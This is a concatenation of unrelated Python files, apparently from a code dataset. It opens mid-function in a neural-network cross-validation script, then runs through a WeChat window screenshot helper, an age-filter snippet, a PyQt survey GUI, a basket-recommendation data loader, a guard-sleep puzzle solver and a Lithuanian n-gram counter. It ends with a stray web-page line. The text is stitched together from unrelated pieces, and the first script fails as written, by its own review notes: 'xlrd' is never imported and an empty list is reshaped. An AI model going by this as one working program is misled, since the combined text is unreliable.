    np.sqrt(sklearn.metrics.mean_squared_error(obs, pre)) but removes the
    sklearn dependency from this helper.
    """
    diff = np.asarray(obs, dtype=float) - np.asarray(pre, dtype=float)
    return np.sqrt(np.mean(diff ** 2))
def caculate_cor():
    """Predict on the current train/test split and store the Pearson
    correlation matrices and RMSEs for the first target in module globals.

    Reads globals: model, x_test, x_train, y_test, y_train, test_index,
    train_index, colnames.
    Writes globals: r_test, r_train, y_test_pred, y_train_pred,
    rmse_test, rmse_train.
    """
    global r_test,r_train,y_test_pred,y_train_pred,rmse_test,rmse_train
    # Reshape flat model output to the observed frame's shape and keep the
    # split's original row indices so predictions line up with source rows.
    y_test_pred=pd.DataFrame(model.predict(x_test).reshape(y_test.shape),index=test_index)
    # 2x2 correlation matrix between prediction column 0 and the first target.
    r_test=np.corrcoef(y_test_pred[0],y_test[colnames[0]])
    y_train_pred=pd.DataFrame(model.predict(x_train).reshape(y_train.shape),index=train_index)
    r_train=np.corrcoef(y_train_pred[0],y_train[colnames[0]])
    rmse_test=rmse(y_test[colnames[0]],y_test_pred[0])
    rmse_train=rmse(y_train[colnames[0]],y_train_pred[0])
#################################################################################################3
# ---- Data loading and train/val/test split ----------------------------------
frame=pd.read_excel('ANN.xlsx',sheet_name=1)
#dummies_method=pd.get_dummies(frame['Method'],columns='Method')#
# First 31 columns are features, the remaining columns are targets.
x_data=frame.iloc[:,:31]
y_data=frame.iloc[:,31:]
# 60/20/20 train/val/test split (the second call carves 25% out of the 80%).
x_train,x_test,y_train,y_test=train_test_split(x_data,y_data,test_size=0.2,random_state=1234)
x_train,x_val,y_train,y_val=train_test_split(x_train,y_train,test_size=0.25,random_state=1234)
colnames=y_data.columns.values.tolist()
#xdata[['Carbon','Macromolecular Compound','Com-1','Com-2','Oxide','Salt','Dim','Hollow','Zeta Potential (mV)']]= xdata['Carbon'].apply(pd.to_numeric)#
# ---- Load the prediction sheet cell by cell into a float DataFrame ----------
# NOTE(review): `xlrd` is used below but never imported in this file — this
# raises NameError at runtime; add `import xlrd` at the top of the file.
file1='predict.xlsx'
wb1=xlrd.open_workbook(filename=file1)
ws1=wb1.sheet_by_name('Sheet1')
predictdata=[]
for i in range(ws1.nrows):
    col=[]
    for j in range(ws1.ncols):
        col.append(ws1.cell(i,j).value)
    predictdata.append(col)
# Row 0 holds the column headers; the rest are numeric values.
predf=pd.DataFrame(predictdata[1:],columns=predictdata[0],dtype='float64')
# Cross-validation splitters and accumulators for the 10 runs below.
ss=ShuffleSplit(n_splits=10, test_size=0.1,random_state=0)
kf=KFold(n_splits=10,shuffle=False)
prelist=[]
corlist_train=[]
corlist_test=[]
rmsel_train=[]
rmsel_test=[]
o=[]
# ---- 10-repeat ShuffleSplit experiment on sheet 1 ---------------------------
with tqdm(total=10) as pbar:
    for train_index , test_index in ss.split(x_data,y_data):
        # NOTE(review): `global` at module level is a no-op; harmless here.
        global x_train,y_train,x_test,y_test
        x_train=x_data.iloc[train_index,:]
        y_train=y_data.iloc[train_index,:]
        x_test=x_data.iloc[test_index,:]
        y_test=y_data.iloc[test_index,:]
        # 57 hidden units over 28 inputs; SGD lr=0.1, momentum=0.9,
        # decay=1e-4, 2000 epochs.
        Set_network(57,28)
        Network_train('sgd',0.1,0.9,0.0001,2000)
        #pre=model.predict(predf)
        #prelist.append(pre.T)
        caculate_cor()
        corlist_train.append(r_train[1,0])
        corlist_test.append(r_test[1,0])
        rmsel_train.append(rmse_train)
        rmsel_test.append(rmse_test)
        scatter_loss_plot()
        # Each fold appends 4 series to `o`: train-obs, train-pred,
        # test-obs, test-pred (hence the stride-4 indexing below).
        o.append(y_train[colnames[0]])
        o.append(y_train_pred[0])
        o.append(y_test[colnames[0]])
        o.append(y_test_pred[0])
        pbar.update(1)
# NOTE(review): `prelist` stays empty because the predict lines above are
# commented out, so reshape(10,5) raises ValueError when run as written.
presult=pd.DataFrame(np.array(prelist).reshape(10,5),columns=['T','C','S','M','L'])
cordf=pd.DataFrame({'tarin':corlist_train,'test':corlist_test})
rmsedf=pd.DataFrame({'rmse_train':rmsel_train,'rmse_test':rmsel_test})
# Assemble observed column plus the 10 train-pred and 10 test-pred series.
obs_pre_df=pd.DataFrame([y_data[colnames[0]],o[1],o[5],o[9],o[13],o[17],o[21],o[25],o[29],o[33],o[37],
                         o[3],o[7],o[11],o[15],o[19],o[23],o[27],o[31],o[35],o[39]]).T
obs_pre_df.columns=(colnames[0],'train1','train2','train3','train4','train5',
                    'train6','train7','train8','train9','train10',
                    'test1','test2','test3','test4','test5',
                    'test6','test7','test8','test9','test10')
writer=pd.ExcelWriter('anti-relu.xlsx')
write_result(3)
writer.save()
# Persist the final fold's model and weights.
weight=model.get_weights()
model.save('anti-relu-model.h5')
model.save_weights("anti-relu-weights.h5")
# ---- Repeat the CV experiment for sheets 1..12 with standardized features ---
writer1=pd.ExcelWriter('ann-op.xlsx')
writer2=pd.ExcelWriter('ann-cor.xlsx')
for i in trange(1,13):
    frame=pd.read_excel('ANN.xlsx',sheet_name=i)
    x_data=frame.iloc[:,0:31]
    y_data=frame.iloc[:,31:]
    x_names=x_data.columns.values.tolist()
    colnames=y_data.columns.values.tolist()
    ss=ShuffleSplit(n_splits=10, test_size=0.1,random_state=0)
    # Standardize features over the whole sheet (before splitting).
    stdsc=StandardScaler()
    x_data=pd.DataFrame(stdsc.fit_transform(x_data))
    x_data.columns=x_names
    prelist=[]
    corlist_train=[]
    corlist_test=[]
    o=[]
    with tqdm(total=10) as pbar:
        for train_index , test_index in ss.split(x_data,y_data):
            # NOTE(review): `global` at module level is a no-op.
            global x_train,y_train,x_test,y_test
            x_train=x_data.iloc[train_index,:]
            #x_train=pd.DataFrame(stdsc.fit_transform(x_train))
            #x_train.columns=x_names
            y_train=y_data.iloc[train_index,:]
            x_test=x_data.iloc[test_index,:]
            #x_test=pd.DataFrame(stdsc.fit_transform(x_test))
            #x_test.columns=x_names
            y_test=y_data.iloc[test_index,:]
            # 62 hidden units over 31 inputs; Adam lr=0.1, no decay, 200 epochs.
            Set_network(62,31)
            Network_train('Adam',0.1,0.9,0,200)
            caculate_cor()
            corlist_train.append(r_train[1,0])
            corlist_test.append(r_test[1,0])
            #scatter_loss_plot()
            # Same 4-entries-per-fold layout as the first experiment.
            o.append(y_train[colnames[0]])
            o.append(y_train_pred[0])
            o.append(y_test[colnames[0]])
            o.append(y_test_pred[0])
            pbar.update(1)
    cordf=pd.DataFrame({'tarin':corlist_train,'test':corlist_test})
    obs_pre_df=pd.DataFrame([y_data[colnames[0]],o[1],o[5],o[9],o[13],o[17],o[21],o[25],o[29],o[33],o[37],
                             o[3],o[7],o[11],o[15],o[19],o[23],o[27],o[31],o[35],o[39]]).T
    obs_pre_df.columns=(colnames[0],'train1','train2','train3','train4','train5',
                        'train6','train7','train8','train9','train10',
                        'test1','test2','test3','test4','test5',
                        'test6','test7','test8','test9','test10')
    # One results sheet per target column name.
    obs_pre_df.to_excel(writer1,sheet_name=colnames[0])
    cordf.to_excel(writer2,sheet_name=colnames[0])
writer1.save()
writer2.save()
#!/usr/bin/python
# -*- coding=utf-8 -*-
# 截图ScreenShot.py
import ctypes
import win32gui
from PIL import ImageGrab
import win32con
from ctypes import wintypes
import ctypes,os,time
def screenShot():
    """Grab a screenshot of the WeChat main window and save it under ./img/.

    Returns:
        The generated file name ('PrtSrc<timestamp>.jpg'), or None when the
        target window could not be found.
    """
    # Locate the target window by window class and title (adjust for other apps).
    hwnd = win32gui.FindWindow("WeChatMainWndForPC", "微信")
    if not hwnd:
        # BUG FIX: the original only printed here and then fell through,
        # crashing in SetForegroundWindow(0). Bail out early instead.
        print('window not found!')
        return None
    print(hwnd)

    def get_window_rect(hwnd):
        """Return the window's (left, top, right, bottom) screen rectangle.

        Uses DwmGetWindowAttribute with EXTENDED_FRAME_BOUNDS so the visible
        frame (without the invisible resize border) is measured. Returns None
        when the DWM API is unavailable.
        """
        try:
            f = ctypes.windll.dwmapi.DwmGetWindowAttribute
        except WindowsError:
            f = None
        if f:
            rect = ctypes.wintypes.RECT()
            DWMWA_EXTENDED_FRAME_BOUNDS = 9
            f(ctypes.wintypes.HWND(hwnd),
              ctypes.wintypes.DWORD(DWMWA_EXTENDED_FRAME_BOUNDS),
              ctypes.byref(rect),
              ctypes.sizeof(rect))
            return rect.left, rect.top, rect.right, rect.bottom

    # win32gui.ShowWindow(hwnd, win32con.SW_RESTORE)  # restore first if minimized
    win32gui.SetForegroundWindow(hwnd)  # bring the window to front so the grab sees it
    # Crop the full-screen grab down to the window rectangle.
    game_rect = get_window_rect(hwnd)
    src_image = ImageGrab.grab(game_rect)
    # src_image = ImageGrab.grab((game_rect[0] + 9, game_rect[1] + 190, game_rect[2] - 9, game_rect[1] + 190 + 450))
    localtime = time.strftime("%Y%m%d%H%M%S", time.localtime())  # timestamp
    src_image_path = 'PrtSrc' + localtime + '.jpg'
    print(src_image_path)
    # NOTE(review): assumes ./img/ already exists; save() fails otherwise.
    src_image.save("./img/" + 'PrtSrc' + localtime + '.jpg')
    print("截图时间:" + localtime)
    # src_image.show()
    return src_image_path
if __name__ == '__main__':
    # Run a single capture when executed as a script.
    screenShot()
|
# Read three ages, then print only those in the working-age range [18, 60].
first_age = int(input('Prima varsta'))
second_age = int(input('A doua varsta'))
third_age = int(input('A treia varsta'))
for age in (first_age, second_age, third_age):
    if 18 <= age <= 60:
        print(age)
from PyQt5.QtWidgets import QMainWindow, QFileDialog
from GUI.ui_SurveyMod import ui_SurveyMod
from SurveyMod import SurveyMod
import json
class GUISurveyMod(QMainWindow):
    """Main window that drives a SurveyMod run from two JSON config files
    and mirrors the survey's log and generated mails into the UI."""

    # Optional StringIO-like log buffer; read by checkLog when set.
    log = None
    # The active SurveyMod instance, created by run().
    survey = None

    def __init__(self):
        super().__init__()
        self.ui = ui_SurveyMod()
        self.ui.setupUi(self)
        # Wire the three buttons to their handlers.
        self.ui.runButton.clicked.connect(self.run)
        self.ui.siteConfigButton.clicked.connect(self.chooseSiteConfig)
        self.ui.helperConfigButton.clicked.connect(self.chooseHelpConfig)

    def run(self):
        """Load both JSON configs and run the survey for the chosen iterations."""
        site_path = self.ui.siteConfigLine.text()
        helper_path = self.ui.helperConfigLine.text()
        iteration_count = self.ui.iterationsConfigLine.value()
        # Guard clause: all three inputs must be usable before starting.
        if not site_path or not helper_path or iteration_count <= 0:
            return
        with open(site_path) as fh:
            site_cfg = json.load(fh)
        with open(helper_path) as fh:
            helper_cfg = json.load(fh)
        self.survey = SurveyMod(site_cfg, helper_cfg, None)
        self.survey.notificator = self.checkLog
        self.survey.run(iteration_count)

    def _pickJsonFile(self, caption, line_edit):
        """Show a non-native open dialog filtered to *.json and write the
        chosen path into the given line edit (shared by both choosers)."""
        options = QFileDialog.Options()
        options |= QFileDialog.DontUseNativeDialog
        path, _ = QFileDialog.getOpenFileName(self, caption, "", "JSON Files (*.json)", options=options)
        if path:
            line_edit.setText(path)

    def chooseSiteConfig(self):
        """Let the user pick the site config JSON file."""
        self._pickJsonFile("Site Config ", self.ui.siteConfigLine)

    def chooseHelpConfig(self):
        """Let the user pick the helper config JSON file."""
        self._pickJsonFile("Helper Config ", self.ui.helperConfigLine)

    def checkLog(self):
        """Refresh the log and mail panes from the survey's current state."""
        if self.log:
            self.ui.log.setPlainText(self.log.getvalue())
        if self.survey:
            self.ui.mails.setHtml(self.survey.mailTexts)
|
import numpy as np
import random
import copy
class Dataset(object):
    """Loads per-session transaction and price data and produces shuffled
    positive/negative training examples for a basket-recommendation model.

    Built by init_paras:
        itemset: list of dense item codes 0..itemnum-1.
        item2price: dense item code -> mean price across sessions.
        item_encode: raw item id -> dense code.
        user2transaction: userid -> {sessionid: [[item, price], ...]}.
        user2trainsaction_list: per-user list of session baskets
            (object ndarray; sessions have variable length).
    """

    def __init__(self, inputfile):
        self.user2transaction = {}
        self.user2trainsaction_list = []
        self.train_file = inputfile
        self.item_sess_prices_files = "data/item_sess_price.tsv"
        self.itemset = []
        self.item2price = {}
        self.item_encode = {}
        self.init_paras()
        self.basketnum = 8   # fixed candidate-basket size fed to the model
        self.batchsize = 5   # every batch needs 5 users to train

    def init_paras(self):
        """Parse the price file and the training file into the lookup tables."""
        session_item2price = {}
        # Price file lines: raw_item_id \t session_id \t price
        # BUG FIX: use `with` so the file handles are always closed.
        with open(self.item_sess_prices_files, 'r') as f:
            lines = f.readlines()
        item_encode = 0
        for line in lines:
            line_list = line.strip().split('\t')
            itemid = int(line_list[0])
            price = float(line_list[2])
            if itemid not in self.item_encode:
                # First sighting of this raw id: assign the next dense code.
                self.itemset.append(item_encode)
                self.item2price[item_encode] = [price]
                self.item_encode[itemid] = item_encode
                item_encode += 1
            else:
                self.item2price[self.item_encode[itemid]].append(price)
            session_item2price[(int(self.item_encode[itemid]), int(line_list[1]))] = float(line_list[2])
        # Collapse the per-session prices into the mean price per item.
        for key in self.item2price:
            self.item2price[key] = np.mean(self.item2price[key])
        self.itemnum = len(self.itemset)

        # Training file lines: userid \t raw_item_id \t sessionid \t score
        with open(self.train_file, 'r') as f:
            lines = f.readlines()
        for line in lines:
            line_list = line.strip().split('\t')
            userid = int(line_list[0])
            itemid = self.item_encode[int(line_list[1])]
            sessionid = int(line_list[2])
            score = float(line_list[3])  # parsed but not used downstream
            price = session_item2price[(itemid, sessionid)]
            if userid not in self.user2transaction:
                self.user2transaction[userid] = {}
            if sessionid not in self.user2transaction[userid]:
                self.user2transaction[userid][sessionid] = [[itemid, price]]
            else:
                self.user2transaction[userid][sessionid].append([itemid, price])
        # Flatten to a per-user list of session baskets (session ids dropped).
        # BUG FIX: the original called sorted(self.user2transaction) and threw
        # the result away (dicts are not sorted in place), then indexed the
        # output with [key-1], silently assuming a contiguous 1..N id range.
        # Iterating the sorted user ids and appending is order-correct and
        # robust to gaps in the id space.
        for userid in sorted(self.user2transaction):
            self.user2trainsaction_list.append(
                list(self.user2transaction[userid].values()))
        # dtype=object is required for this ragged structure; modern NumPy
        # refuses the implicit ragged-to-array conversion.
        self.user2trainsaction_list = np.array(self.user2trainsaction_list, dtype=object)
        self.usernum = len(self.user2trainsaction_list)

    # Record layout: [userid, target_item, price, [now_basket], [candidate_basket]]
    def get_traindataset(self):
        """Build shuffled positive and negative training records.

        Returns:
            (return_list, label_list): each positive record (label 1.0) is
            followed by negative records (label 0.0) for the random filler
            items of its candidate basket.
        """
        # NOTE(review): hard-coded to the first 250 users — presumably the
        # dataset has exactly 250; confirm, or switch to self.usernum.
        users_list = list(range(250))
        random.shuffle(users_list)  # visit users in random order
        users_list = np.array(users_list)
        return_list = []
        label_list = []
        for user in users_list:
            for index, trip in enumerate(self.user2trainsaction_list[user]):
                # NOTE(review): now_basket is never extended with purchased
                # items, so it stays empty; if an incremental basket was
                # intended, append target_item after each positive — confirm.
                now_basket = []
                for items in trip:
                    target_item = items[0]
                    price = items[1]
                    # Candidate basket = current basket + target + random fillers.
                    basket = self.make_basket(now_basket, target_item)
                    return_list.append([user, target_item, price, now_basket, basket])
                    label_list.append(1.0)
                    # Negative samples: filler items that were not purchased.
                    for neg_sample in basket:
                        if neg_sample not in now_basket and neg_sample != target_item:
                            return_list.append([user, neg_sample, self.item2price[neg_sample], now_basket, basket])
                            label_list.append(0.0)
        return return_list, label_list

    def make_basket(self, now_basket, target_item):
        """Return a copy of now_basket plus target_item, padded with random
        distinct item codes up to self.basketnum entries."""
        basket = copy.copy(now_basket)
        basket.append(target_item)
        for _ in range(self.basketnum - len(basket)):
            j = np.random.randint(0, self.itemnum)
            while j in basket:  # re-draw until the filler is not a duplicate
                j = np.random.randint(0, self.itemnum)
            basket.append(j)
        return basket
# test_dataset = Dataset("data/train.tsv")
# #print(len(test_dataset.get_traindataset()))
# test_dataset.get_traindataset() |
from utils import (
get_guard_periods,
lines_to_records,
read_input
)
def get_most_asleep_guard_on_same_minute(guard_periods):
    """Return the guard id whose single most-slept minute has the highest count.

    Args:
        guard_periods: mapping of guard id -> per-minute sleep counts.

    The original built a list of all ids, sorted it by peak count, and took
    the last element — an O(n log n) pass for what is a single maximum. This
    scans once, using >= so that on ties the *last* guard in iteration order
    wins, exactly as the stable sort's [-1] did.
    """
    best_id = None
    best_peak = None
    for guard_id, minutes in guard_periods.items():
        peak = max(minutes)
        if best_id is None or peak >= best_peak:
            best_id, best_peak = guard_id, peak
    return best_id
if __name__ == '__main__':
    # Parse the raw input into records, then tally per-guard sleep minutes.
    sleep_minutes = get_guard_periods(lines_to_records(read_input()))
    chosen_guard = get_most_asleep_guard_on_same_minute(sleep_minutes)
    # The minute at which the chosen guard was asleep most often.
    chosen_minutes = sleep_minutes[chosen_guard]
    top_minute = chosen_minutes.index(max(chosen_minutes))
    print(chosen_guard * top_minute)
|
from collections import Counter
from pathlib import Path
raw_dir = Path(__file__).parent
allowed_chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZĄČĘĖĮŠŲŪŽ"

count = 0
letters = Counter()
_2gram = Counter()
_3gram = Counter()

# Count letter 1/2/3-gram frequencies over a Lithuanian text corpus.
# NOTE(review): hard-coded, machine-specific corpus path — parameterize
# before reuse.
# BUG FIX: the original iterated a bare open() and never closed the handle.
with open('/Users/paulius/Temp/trash/lt_text') as corpus:
    for line in corpus:
        count += 1
        if not count % 1000:
            print(count)  # progress every 1000 lines
        for word in line.split():
            # '…' marks a word boundary so boundary n-grams are counted too;
            # a disallowed character resets the running window.
            sofar = '…'
            for letter in word.upper():
                if letter not in allowed_chars:
                    sofar = ''
                    continue
                letters[letter] += 1
                sofar += letter
                if len(sofar) > 1:
                    _2gram[sofar[-2:]] += 1
                if len(sofar) > 2:
                    _3gram[sofar[-3:]] += 1
            # Close the word with a trailing boundary marker.
            sofar += '…'
            if len(sofar) > 1:
                _2gram[sofar[-2:]] += 1
            if len(sofar) > 2:
                _3gram[sofar[-3:]] += 1


def _dump_frequencies(counter, path):
    """Write 'gram relative_frequency' lines to path, most common first."""
    total = sum(counter.values())
    with open(path, "w") as out:
        for gram, n in counter.most_common():
            out.write(gram + ' ' + str(n / total) + '\n')


# BUG FIX (dedup): the original repeated this block three times, reusing the
# name `count` and thereby clobbering the line counter above.
_dump_frequencies(letters, raw_dir / "1grams.txt")
_dump_frequencies(_2gram, raw_dir / "2grams.txt")
_dump_frequencies(_3gram, raw_dir / "3grams.txt")

if __name__ == '__main__':
    pass
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.